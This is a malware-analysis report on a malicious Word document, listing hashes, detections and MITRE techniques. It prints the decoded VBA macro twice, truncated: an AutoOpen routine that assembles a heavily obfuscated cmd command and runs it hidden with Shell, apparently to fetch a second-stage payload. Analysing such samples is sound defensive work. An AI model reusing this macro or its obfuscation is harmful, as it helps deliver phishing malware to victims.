Office (OLE) malware analysis — malicious · 7d50253b1168a61a

MALICIOUS

Office (OLE)

160.6 KB Created: 2018-07-26 17:42:00 Authoring application: Microsoft Office Word First seen: 2019-02-20

MD5: 096cd372fde3cec77743a7df2303decc SHA-1: b832974ce0df00293eeccbdd1922231c2ae3d152 SHA-256: 7d50253b1168a61a502890fdd13e7245b5f7aa8465da25e3bed00a8fa0a3b4fd

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro attempts to construct and execute a command string, likely to download and run a second-stage payload. The presence of the AutoOpen macro and the nature of the script strongly suggest a phishing attachment delivery vector.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6821700-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6821700-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31186 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	31186 bytes
SHA-256: `09820fccd0dd1315adb93c2ea19b16a7a740b562ef054d58e05b83a16e5e7b86`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "uBkjuGRtNH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next NmMvK = fEwUiH MXzzz = Vtati FEjdE = Gpjvc DWVcP = Log(3303) qEXJwh = dBNauh ZAuEjuWh = "" + lYffWttj + lKLSXFRTQmT + CVar("cm") + WioRPfK + dGURAQFANfAVM + XjzTBMnQQ + QCTbPfFdAC + fARwbB + SnfjqwBC + zENVFzT + EJqCjk + RGTJPwzN + MZCRbGbJ + tAGIVQuE + WMVQj + LCSFauSGzm + MSdjuUiwzpc + dpvLidkoRwm + YiBmlmXC + jJAcaYYf + OFzOlBHb + XXHUmjEB + UQLizPQBoi + ujTzzRiEiz + wzzRziCQzc + LiPwBVubIMX + KCGUtN + iuJzuCKzOoU + FLpEwUCaNi + wYqqFk + qjDWwGqziq + QSdCBph + uwRVFBzNtfj + vXuQBjpiwiP + pZJJazh + lupUPiC + rDcwhAhZ + RdEizDvzis + qIujCqlXS + IJbXv + PDBLZRZvk + DHRzUoJ + miLwmY + EANPYnj + uhNtJilW QtrUY = Round(51) dmuRHC = Hex(PQbCG - CYrzC) Shell@ ZAuEjuWh, 0 sfpXsn = CLng(MNjprp * tksmi) End Sub Attribute VB_Name = "tGiQXNrCsSX" Function XjzTBMnQQ() On Error Resume Next iAqmUn = "d " FFMEwouNzXN = " " + "/c " + " " + " " + " FOR /F " + CStr(Chr(fhqntMVnGnj + GAjGTNNl + 34 + RoopqMTVWjS + WRWctIWb)) + "t" ABTEQ = Oct(PzPNpH) fMstmqR = "oke" + "ns=2 delim" + "s=6JcHF" + CStr(Chr(wsSvUwj + ACZzFWfbnRNdp + 34 + NowlUdJCGjrzX + ZpwcQHwSRFOjiJ)) + " %B" + " IN" XhjdCsaCj = " ('fty" + "pe" + "^\|find" + " " + CStr(Chr(GCdhjzvRMqz + NZIKosXfM + 34 + QWffFwatIIlu + SathQZHdCDfG)) + "m" + "dF" + CStr(Chr(RZwtduRJTQLPPG + ciNbWSiz + 34 + bnTbzzajbjLrRz + GdWAJATv)) + "'" nisiH = RYNusw sucrKk = lXIJu HzOzWChhifQ = ")DO %" + "B /V/C" + " " + " " + CStr(Chr(svXzvwz + iqsQLpjib + 34 + MOJOMAbvpaUY + GiJcnNunjnSNNK)) + " " IJXBq = CDate(loDhBl - MkIFaG) zljaZB = Oct(91336 + nndic + KYBoE * 44000) QwhMC = Oct(kYNwn) cuzGcbSi = "SEt {" + "._=--_/-\" + "/_\/\-\/_ " + "_-\/_--_\" + "_\//-\ " mtMwk = CStr(Pajur + BOdnNZ - XMPfbX * zPHWjP) WiosMN = dAGtl QLHwK = "_-\-" + "\/-__" + "\" + "_/\// /\--" + "/\\__\-/" nEuimUPzFz = "_/- _\-" + "/-/_-" + "\-_//\_ -" + "_\-__" + "\/\//" + "-/_\ -_" + "\/" XjzTBMnQQ = iAqmUn + FFMEwouNzXN + fMstmqR + XhjdCsaCj + HzOzWChhifQ + cuzGcbSi + QLHwK + nEuimUPzFz RMhoPJ = NlbmY KNbSN = ChrW(zzVNTz) End Function Function QCTbPfFdAC() On Error Resume Next hlnik = CStr(80610 / zaKiw * CQaoa / ptSTw) SqTVRa = oEpwu sFqZkXjbmXW = "\-\" + "//\_/" + "__" + "- \-" NBIjs = zFmiXW PSqAFX = 45 mMiNip = "__/_\\-/\/" + "--/ " + "/-\_" + "/-/_\\-" + "\__- _-" sDqbz = Rnd(52334 - 53499 * LiofRL + lwUlj) EihwP = Tan(60174 - 5208 / 14485 - dLkMol) DjJpXH = 573 jsRFWopMadj = "_\-//\" cPJCj = 1 viioV = Chr(15141 / FhPwI + PfizCB * 66533) wAGSH = ChrB(TzCiF) XUcLpPvF = "_/" + "\_-" + "/- //" + "_/" + "/_\-\-" + "_--\_ \_/" + "_/--_\/" wpsZrl = Atn(20329 - 19226 - 59960 * cLujU) dIRkI = 7491 qoXNzbznHHj = "-_/\\ /_/-" + "\" + "-/_-\-/" + "\_\ -/\\" + "\___/-/_-" oVCbEO = CLng(520347317) Dmzdii = WFTFO nzLvEj = "\- \_--\/\" + "_/_/-" + "\_-" iUcFZw = ofclCP GsBdLpCdLC = " /-\/\\\--" + "__//__ _//" + "/_-\-\" QCTbPfFdAC = sFqZkXjbmXW + mMiNip + jsRFWopMadj + XUcLpPvF + qoXNzbznHHj + nzLvEj + GsBdLpCdLC oqfruV = 485367124 End Function Function fARwbB() On Error Resume Next nvioDB = Sgn(DXXHbJ) qAKBBSk = "\--\_/ /" wTBwb = Rnd(263166597) cTAQUwwmz = "/_\/-\/" + "\__-_-\" sRYYt = Rnd(2) RGinfMU = "}" PWPsqb = "_\/-_/\" lFmDQ = Round(baCwsk) Dadrws = tcMdws idziwB = CInt(uXijG * mcKJUN) ThViLzA = "-__" + "-\/" KGIMq = Sin(66063 / 8336) Cpwro = Round(51) zICnV = "\/}" + "/--/-_/\\" + "_/_" + "\-_{/_-\-" JaCVrz = Round(dAuVD / Dzhlz) OmXqajSE = "-\__/" + "_-/\\h\" + "--\" + "/" + "___/-/\-/" zVVGhv = CSng(5859 * CopGMj) HWcanJnv = "\c\-" + "\/-_\__/" + "-/_-\t" + "_-\_\//" fARwbB = qAKBBSk + cTAQUwwmz + RGinfMU + PWPsqb + ThViLzA + zICnV + OmXqajSE + HWcanJnv TIzjp = 185816532 TzzqQG = JRGKEj End Function Function ... (truncated)

SHA-256: 09820fccd0dd1315adb93c2ea19b16a7a740b562ef054d58e05b83a16e5e7b86

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "uBkjuGRtNH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   NmMvK = fEwUiH
   MXzzz = Vtati
   FEjdE = Gpjvc
   DWVcP = Log(3303)
   qEXJwh = dBNauh
ZAuEjuWh = "" + lYffWttj + lKLSXFRTQmT + CVar("cm") + WioRPfK + dGURAQFANfAVM + XjzTBMnQQ + QCTbPfFdAC + fARwbB + SnfjqwBC + zENVFzT + EJqCjk + RGTJPwzN + MZCRbGbJ + tAGIVQuE + WMVQj + LCSFauSGzm + MSdjuUiwzpc + dpvLidkoRwm + YiBmlmXC + jJAcaYYf + OFzOlBHb + XXHUmjEB + UQLizPQBoi + ujTzzRiEiz + wzzRziCQzc + LiPwBVubIMX + KCGUtN + iuJzuCKzOoU + FLpEwUCaNi + wYqqFk + qjDWwGqziq + QSdCBph + uwRVFBzNtfj + vXuQBjpiwiP + pZJJazh + lupUPiC + rDcwhAhZ + RdEizDvzis + qIujCqlXS + IJbXv + PDBLZRZvk + DHRzUoJ + miLwmY + EANPYnj + uhNtJilW
   QtrUY = Round(51)
   dmuRHC = Hex(PQbCG - CYrzC)
Shell@ ZAuEjuWh, 0
   sfpXsn = CLng(MNjprp * tksmi)
End Sub


Attribute VB_Name = "tGiQXNrCsSX"
Function XjzTBMnQQ()
On Error Resume Next
iAqmUn = "d        "
FFMEwouNzXN = "       " + "/c     " + "     " + "    " + " FOR /F " + CStr(Chr(fhqntMVnGnj + GAjGTNNl + 34 + RoopqMTVWjS + WRWctIWb)) + "t"
ABTEQ = Oct(PzPNpH)
fMstmqR = "oke" + "ns=2 delim" + "s=6JcHF" + CStr(Chr(wsSvUwj + ACZzFWfbnRNdp + 34 + NowlUdJCGjrzX + ZpwcQHwSRFOjiJ)) + " %B" + " IN"
XhjdCsaCj = " ('fty" + "pe" + "^|find" + " " + CStr(Chr(GCdhjzvRMqz + NZIKosXfM + 34 + QWffFwatIIlu + SathQZHdCDfG)) + "m" + "dF" + CStr(Chr(RZwtduRJTQLPPG + ciNbWSiz + 34 + bnTbzzajbjLrRz + GdWAJATv)) + "'"
nisiH = RYNusw
   sucrKk = lXIJu
HzOzWChhifQ = ")DO %" + "B   /V/C" + " " + "   " + CStr(Chr(svXzvwz + iqsQLpjib + 34 + MOJOMAbvpaUY + GiJcnNunjnSNNK)) + "  "
IJXBq = CDate(loDhBl - MkIFaG)
   zljaZB = Oct(91336 + nndic + KYBoE * 44000)
   QwhMC = Oct(kYNwn)
cuzGcbSi = "SEt     {" + "._=--_/-\" + "/_\/\-\/_ " + "_-\/_--_\" + "_\//-\ "
mtMwk = CStr(Pajur + BOdnNZ - XMPfbX * zPHWjP)
   WiosMN = dAGtl
QLHwK = "_-\-" + "\/-__" + "\" + "_/\// /\--" + "/\\__\-/"
nEuimUPzFz = "_/- _\-" + "/-/_-" + "\-_//\_ -" + "_\-__" + "\/\//" + "-/_\ -_" + "\/"
XjzTBMnQQ = iAqmUn + FFMEwouNzXN + fMstmqR + XhjdCsaCj + HzOzWChhifQ + cuzGcbSi + QLHwK + nEuimUPzFz
   RMhoPJ = NlbmY
   KNbSN = ChrW(zzVNTz)
End Function
Function QCTbPfFdAC()
On Error Resume Next
hlnik = CStr(80610 / zaKiw * CQaoa / ptSTw)
   SqTVRa = oEpwu
sFqZkXjbmXW = "\-\" + "//\_/" + "__" + "- \-"
NBIjs = zFmiXW
   PSqAFX = 45
mMiNip = "__/_\\-/\/" + "--/ " + "/-\_" + "/-/_\\-" + "\__- _-"
sDqbz = Rnd(52334 - 53499 * LiofRL + lwUlj)
   EihwP = Tan(60174 - 5208 / 14485 - dLkMol)
   DjJpXH = 573
jsRFWopMadj = "_\-//\"
cPJCj = 1
   viioV = Chr(15141 / FhPwI + PfizCB * 66533)
   wAGSH = ChrB(TzCiF)
XUcLpPvF = "_/" + "\_-" + "/- //" + "_/" + "/_\-\-" + "_--\_ \_/" + "_/--_\/"
wpsZrl = Atn(20329 - 19226 - 59960 * cLujU)
   dIRkI = 7491
qoXNzbznHHj = "-_/\\ /_/-" + "\" + "-/_-\-/" + "\_\ -/\\" + "\___/-/_-"
oVCbEO = CLng(520347317)
   Dmzdii = WFTFO
nzLvEj = "\- \_--\/\" + "_/_/-" + "\_-"
iUcFZw = ofclCP
GsBdLpCdLC = " /-\/\\\--" + "__//__ _//" + "/_-\-\"
QCTbPfFdAC = sFqZkXjbmXW + mMiNip + jsRFWopMadj + XUcLpPvF + qoXNzbznHHj + nzLvEj + GsBdLpCdLC
   oqfruV = 485367124
End Function
Function fARwbB()
On Error Resume Next
nvioDB = Sgn(DXXHbJ)
qAKBBSk = "\--\_/ /"
wTBwb = Rnd(263166597)
cTAQUwwmz = "/_\/-\/" + "\__-_-\"
sRYYt = Rnd(2)
RGinfMU = "}"
PWPsqb = "_\/-_/\"
lFmDQ = Round(baCwsk)
   Dadrws = tcMdws
   idziwB = CInt(uXijG * mcKJUN)
ThViLzA = "-__" + "-\/"
KGIMq = Sin(66063 / 8336)
   Cpwro = Round(51)
zICnV = "\/}" + "/--/-_/\\" + "_/_" + "\-_{/_-\-"
JaCVrz = Round(dAuVD / Dzhlz)
OmXqajSE = "-\__/" + "_-/\\h\" + "--\" + "/" + "___/-/\-/"
zVVGhv = CSng(5859 * CopGMj)
HWcanJnv = "\c\-" + "\/-_\__/" + "-/_-\t" + "_-\_\//"
fARwbB = qAKBBSk + cTAQUwwmz + RGinfMU + PWPsqb + ThViLzA + zICnV + OmXqajSE + HWcanJnv
   TIzjp = 185816532
   TzzqQG = JRGKEj
End Function
Function 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.